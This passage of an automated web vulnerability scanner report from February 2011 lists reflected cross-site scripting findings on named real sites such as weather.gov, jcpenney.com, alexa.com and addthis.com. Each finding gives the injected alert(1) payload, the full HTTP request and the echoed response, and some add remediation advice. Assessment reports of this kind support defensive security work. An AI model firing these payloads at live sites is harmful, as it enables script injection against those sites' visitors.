Host:   http://www.weather.gov
Path:   /view/validProds.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32472"%20a%3db%20fbe5d3494a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32472" a=b fbe5d3494a4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/validProds.php/32472"%20a%3db%20fbe5d3494a4 HTTP/1.1
Host: www.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Age: 20
X-Cache-TTL: 580
Date: Sat, 26 Feb 2011 02:32:57 GMT
Content-Length: 30061
Content-Type: text/html; charset=iso-8859-1
Expires: Sat, 26 Feb 2011 02:42:57 GMT
Cache-Control: max-age=600
Connection: close
Server: Apache
Vary: Accept-Encoding
Via: 1.1 nws-hq-cache01 (NetCache NetApp/6.0.7)
X-Cached-Time: Sat, 26 Feb 2011 02:33:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin template="/Te
...[SNIP]...
<a href="/view/validProds.php/32472" a=b fbe5d3494a4?prod=ABV">
...[SNIP]...

1.497. http://www.wrh.noaa.gov/sew/main.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wrh.noaa.gov
Path:   /sew/main.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff97e"><script>alert(1)</script>4bc70615a2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sew/main.php/ff97e"><script>alert(1)</script>4bc70615a2f HTTP/1.1
Host: www.wrh.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=1199
Expires: Wed, 23 Feb 2011 23:25:10 GMT
Date: Wed, 23 Feb 2011 23:05:11 GMT
Content-Length: 20383
Connection: close


<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en">
<head>
<title>National Weather Service - Western Region Headquarters</title><link rel='STYLESHEET' type
...[SNIP]...
<a href="http://www.wrh.noaa.gov/sew/main.php/ff97e"><script>alert(1)</script>4bc70615a2f?wfo=&sid=&pil=&zone=&lat=&lon=&date=&format=printer">
...[SNIP]...

1.498. http://www2.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.jcpenney.com
Path:   /jcp/getjcpheaderc.aspx

Issue detail

The value of the function request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e9d26%3balert(1)//15808bcbf87 was submitted in the function parameter. This input was echoed as e9d26;alert(1)//15808bcbf87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jcp/getjcpheaderc.aspx?function=getmenuitemse9d26%3balert(1)//15808bcbf87&ver=20110225&fx=3 HTTP/1.1
Host: www2.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www2.jcpenney.com/jcp/x2.aspx?DeptID=70656&CatID=70656&cmAMS_T=G1&cmAMS_C=D1B&mscssid=6781f8d69adfb4b56a7c960f89a4dcae2xMnVNoV5a3oxMnVNoV5a3W200B58E3AFFEDC3F853B83DAF37AF65E61271105704&cmAMS_V=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Cache-Control: private
Expires: Sat, 26 Feb 2011 16:53:15 GMT
Content-Type: text/html; charset=utf-8
ntCoent-Length: 56
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 04:53:15 GMT
Connection: close
Content-Length: 56

Error function : getmenuitemse9d26;alert(1)//15808bcbf87

1.499. http://www4.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www4.jcpenney.com
Path:   /jcp/getjcpheaderc.aspx

Issue detail

The value of the function request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ab880%3balert(1)//76fd0243f43 was submitted in the function parameter. This input was echoed as ab880;alert(1)//76fd0243f43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jcp/getjcpheaderc.aspx?function=getmenuitemsab880%3balert(1)//76fd0243f43&ver=20110225&fx=3 HTTP/1.1
Host: www4.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www4.jcpenney.com/jcp/x2.aspx?DeptID=70676&CatID=70676&cmAMS_T=G1&cmAMS_C=D6B&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105702&cmAMS_V=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Cache-Control: private
Expires: Sat, 26 Feb 2011 16:54:54 GMT
Content-Type: text/html; charset=utf-8
ntCoent-Length: 56
Date: Sat, 26 Feb 2011 04:54:54 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 56

Error function : getmenuitemsab880;alert(1)//76fd0243f43

1.500. http://www5.jcpenney.com/jcp/X6E.aspx [CmCatId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www5.jcpenney.com
Path:   /jcp/X6E.aspx

Issue detail

The value of the CmCatId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a2ac'%3balert(1)//283a8961974 was submitted in the CmCatId parameter. This input was echoed as 7a2ac';alert(1)//283a8961974 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage|723847a2ac'%3balert(1)//283a8961974 HTTP/1.1
Host: www5.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www4.jcpenney.com/jcp/XGN.aspx?n=4294953363&catsel=4294953363--comforters+++bedspreads&deptid=70750&pcatid=70750&catid=72384&cattyp=SAL&dep=BEDDING&pcat=BEDDING&cat=Sale&refpagename=Default%252Easpx&refdeptid=&refcatid=&cmAMS_T=T1&cmAMS_C=C3&CmCatId=homepage
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Cache-Control: private
Expires: Sat, 26 Feb 2011 17:11:05 GMT
Content-Type: text/html; charset=utf-8
ntCoent-Length: 255179
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 05:11:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105705&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; domain=.jcpenney.com; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/jcp
Content-Length: 255179


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>JCPenney : 400TC WrinkleGuard Bedding Collection</title>
       <meta content="Microsoft Visual Studio .NET 7.1"
...[SNIP]...
0B181A7FD6BCDF0818AD551CB2274291EC1105705');
   R3_COMMON.addPlacementType('ensemble_page.content1');
   R3_COMMON.addClickthruParams(0, escape('cmOrigId=1a6ddbd&cmTypeFlag=RichRel&cmCatID=homepage|723847a2ac';alert(1)//283a8961974'));
   R3_COMMON.setClickthruServer('http://www5.jcpenney.com/jcp/');
   var R3_ENSEMBLE = new r3_ensemble();
   R3_ENSEMBLE.setId('1a6ddbd');
   R3_ENSEMBLE.setRecommendable('True');
   R3_ENSEMBLE.addCat
...[SNIP]...

1.501. http://www5.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www5.jcpenney.com
Path:   /jcp/getjcpheaderc.aspx

Issue detail

The value of the function request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 79965%3balert(1)//e336fdf9c7 was submitted in the function parameter. This input was echoed as 79965;alert(1)//e336fdf9c7 in the application's response.

This proof-of-concept attack demonstrates that the input is echoed without encoding. Note, however, that the response body shown (Error function : getmenuitems79965;alert(1)//e336fdf9c7) is not valid JavaScript as a whole: if getjcpheaderc.aspx is loaded through a script element, the engine rejects the line at "Error function" before it reaches alert(1), and if the response is rendered directly as a text/html document it contains no markup and the text is inert. Confirm by hand how the page that calls this endpoint consumes its error output before treating the finding as exploitable.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Because the value is placed in an unquoted expression, no output encoding can make it safe; the function parameter should be validated against an allow-list of the function names the endpoint actually supports, and anything else rejected without being echoed in the error message.

Request

GET /jcp/getjcpheaderc.aspx?function=getmenuitems79965%3balert(1)//e336fdf9c7&ver=20110225&fx=3 HTTP/1.1
Host: www5.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage|72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; invodoViewer=Aco6Et4bstEd09EYRM1Yae; invodoVisitor=CZoyWu30uu7XbG7RNWuRoh; HistCheck=1; FlashCheck=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Cache-Control: private
Expires: Sat, 26 Feb 2011 16:57:35 GMT
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 55
Date: Sat, 26 Feb 2011 04:57:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 55

Error function : getmenuitems79965;alert(1)//e336fdf9c7

1.502. http://xsltcache.alexa.com/traffic_graph/js/g/a/3m [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://xsltcache.alexa.com
Path:   /traffic_graph/js/g/a/3m

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2150'%3bcdde0a49e5 was submitted in the REST URL parameter 5. This input was echoed as a2150';cdde0a49e5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the value lands in two contexts at once: a single-quoted JavaScript string literal passed to document.write, and the SRC attribute of the IMG tag that string contains. It has to be encoded for the inner HTML attribute context first and then escaped for the JavaScript string context. The Content-Type of text/text is not a defence on its own: a script element's source is executed regardless of the declared type unless the browser blocks it under a nosniff rule.

Request

GET /traffic_graph/js/g/a/3ma2150'%3bcdde0a49e5?&u=www.4shared.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: xsltcache.alexa.com

Response

HTTP/1.0 200 OK
Server: squid
Content-Type: text/text
Content-Length: 314
Date: Wed, 23 Feb 2011 21:40:31 GMT
Connection: close

document.write('<a href="http://www.alexa.com/data/details/traffic_details?url=www.4shared.com" target="_parent">');document.write('<IMG BORDER="0" SRC="http://traffic.alexa.com/graph?a=1&w=250&h=150&r=3ma2150';cdde0a49e5&u=www.4shared.com" alt="Alexa Traffic Graph for www.4shared.com" >
...[SNIP]...

1.503. http://ib.adnxs.com/ttj [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dd58'-alert(1)-'8a44710014e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. The Referer is derived from the URL of the page that links to or frames the target, so an attacker controls it to the extent that they control that URL; current browsers, however, percent-encode characters such as quotation marks and angle brackets when they serialise that URL, which defeats the payloads shown unless the application decodes the header before echoing it. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=396985&pubclick=http://xads.zedo.com/ads2/c%3Fa%3D895737%3Bx%3D2304%3Bg%3D172%3Bc%3D305005852%2C305005852%3Bi%3D0%3Bn%3D305%3Bi%3D0%3Bu%3DjhmxpQoBADYAAET@BzgAAAAW%7E022111%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D421%3Bg%3D172%3Bw%3D47%3Bm%3D82%3Bz%3D0.2778043581638485%3Bp%3D8%3Bf%3D1093076%3Bh%3D1093075%3Bo%3D20%3By%3D331%3Bv%3D1%3Bt%3Di%3Bk= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=6dd58'-alert(1)-'8a44710014e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI93oQChgBIAEoATD7w4vrBBD7w4vrBBgA; uuid2=4470455573253905340; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6WIpbjn!e5'S.ASR/7l([H.cpVGe8tPtQ-y5#we@ie65CB#S!9Y^vP[KF^P'%_EYX5)gWYmv-[1%xvmrNHt.[<D(7u)aj^!iH1rT^=*7C^Bjc%C9:V]:>i#xK^@g2k_woCAWF@?sM.MP<1ic[d6CGz9%wPyKtR:Oy7D34Qm3(6eds:*nw[M7fUB%t6ySwO$b4u(JNrEJOXfpGHm(!<YP8ub*=t

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 24-Feb-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Tue, 24-May-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIr7gCEAoYASABKAEws4KW6wQQs4KW6wQYAA..; path=/; expires=Tue, 24-May-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 23 Feb 2011 21:50:43 GMT
Content-Length: 1050

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=eNFXkGYssj940VeQZiyyPwAAAMDMzPw_eNFXkGY
...[SNIP]...
%28%27r%27%2C+202232%2C+1298497843%29%3B&cnd=!gBqf3QiyggMQ-KsMGAAg8fgCKAAxeNFXkGYssj9CEwgAEAAYACABKP7__________wFCDQjIPhD2bhibEyACKAVIA1AAWP4DYANo5gI.&referrer=http://www.google.com/search%3Fhl=en%26q=6dd58'-alert(1)-'8a44710014e">
...[SNIP]...

1.504. http://www.4shared.com/icons/16x16/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 8177c--><script>alert(1)</script>e023ffda58 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. The parser ends a comment at the first "-->" (or the "--!>" error-recovery form) regardless of what precedes it, so at minimum the ">" character must be encoded or removed before the value is written; the better fix is not to write request headers into the served page at all.

Request

GET /icons/16x16/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
Referer: http://www.google.com/search?hl=en&q=8177c--><script>alert(1)</script>e023ffda58

Response

HTTP/1.1 404 /icons/16x16/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CDCAA8180B4589E683BFFEE2BBFE5DE6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:32 GMT
Connection: close
Content-Length: 36059


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.google.com/search?hl=en&q=8177c--><script>alert(1)</script>e023ffda58-->
...[SNIP]...

1.505. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edc49"><script>alert(1)</script>ac11e21fa42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=edc49"><script>alert(1)</script>ac11e21fa42

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:27:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 94210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=edc49"><script>alert(1)</script>ac11e21fa42" />
...[SNIP]...

1.506. http://www.alexa.com/data/details/traffic_details [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.alexa.com
Path:   /data/details/traffic_details

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f167'-alert(1)-'d2251a39e36 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the value is assigned to google_hints inside an inline script; the quote-and-arithmetic payload needs no closing tag and no statement terminator, so escaping the delimiter (as \x27) is the minimum, and \xHH escaping of every non-alphanumeric character is the safe choice.

Request

GET /data/details/traffic_details?url=www.4shared.com HTTP/1.1
Host: www.alexa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9f167'-alert(1)-'d2251a39e36

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=fhvlr439p6fker8st14uufqgv0; path=/
Set-Cookie: ax_gr_last_tab=%23keywords; expires=Thu, 24-Feb-2011 23:11:06 GMT; path=/siteinfo; domain=.alexa.com
Set-Cookie: rpt=%21; expires=Fri, 25-Feb-2011 00:11:06 GMT; domain=alexa.com
Set-Cookie: rpt=%21; expires=Fri, 25-Feb-2011 00:11:06 GMT; domain=alexa.com
Set-Cookie: lv=1298502666; expires=Fri, 24-Feb-2012 05:11:06 GMT; path=/; domain=alexa.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Connection: close
Date: Wed, 23 Feb 2011 23:11:06 GMT
Server: httpd
Content-Length: 145349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
google_safe='high';
google_color_bg='ffffff';
google_color_border='ffffff';
google_color_line='00ff00';
google_color_link='0033cc';
google_color_text='333333';
google_color_url='339900';
google_hints='9f167'-alert(1)-'d2251a39e36';
</script>
...[SNIP]...

1.507. http://www.espnshop.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.espnshop.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbff4"><script>alert(1)</script>4ecff407bde was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.espnshop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: dbff4"><script>alert(1)</script>4ecff407bde

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:12:51 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=WTLvNlJTDtF21MKvb2SHJwPkRj6x8b1YBqhR05Ll4C2v1CX1gL11!-1678667533; path=/
Set-Cookie: browser_id=121983128284; expires=Saturday, 20-Feb-2021 23:12:51 GMT; path=/
